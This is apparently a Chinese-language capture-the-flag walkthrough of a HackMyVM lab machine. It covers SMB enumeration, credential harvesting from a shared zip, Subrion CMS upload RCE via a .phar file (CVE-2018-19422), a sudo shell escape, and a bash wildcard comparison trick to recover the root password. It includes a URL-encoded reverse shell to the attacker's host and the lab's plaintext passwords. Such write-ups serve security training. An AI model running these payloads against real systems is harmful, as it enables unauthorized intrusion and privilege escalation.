kali:192.168.56.104

主机发现

arp-scan -l

靶机:192.168.56.108

端口扫描

nmap -p- 192.168.56.108

开启了 22 80 139 445端口

进入web

编辑 /etc/hosts，把192.168.56.108 adria.hmv添加进去重新访问

里面没什么有用的东西，注册需要邮箱，这里本地注册不了

因为开启了smb服务，用enum4linux扫一下

enum4linux 192.168.56.108

有个DebianShare的资源

用smbclient连接一下

smbclient //192.168.56.108/DebianShare -N

有个configz的压缩包，get下来

get configz.zip

unzio解压一下，再用grep搜关键词

grep -r "username"
grep -r "pass"

有用户名admin 密码jojo1989，测试登录发现登录成功

找了一下没有利用点，找找后台，源码里发现这是个Subrion 4.2的CMS

网上搜一下，没看到后台，但是发现有个文件上传漏洞CVE-2018-19422

panel/uploads 上传点

自己测试上传发现php文件不行，看了exp需要将后缀改成phar,改完之后可以RCE了

http://adria.hmv/uploads/test.phar?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27

然后tty移植shell才能交互

sudo -l发现可以执行adriana的指令

利用提示界面输入!bash拿adriana的shell

sudo -u adriana /usr/bin/scalar list
!bash

拿到第一个flag

sudo -l可以提权

cat一下

先是读取/root/pass里面的密码，然后让用户输入一个密码，如果两个密码相等，html文件压缩再用PASSWORD加密

但是字符串比较如果第一个字符相等，并且第二个字符为*的话就能比较成功

测试发现 8*比较成功

那么如果此时用pspy64监控进程，那么比较的密码我们就能抓取

UID=0     PID=16375  | /usr/bin/zip -r -e -P 8eNctPoCh4Potes5eVD7eMxUw6wRBmO /opt/backup.zip /var/www/html

抓到密码是

8eNctPoCh4Potes5eVD7eMxUw6wRBmO

用密码su就拿到root权限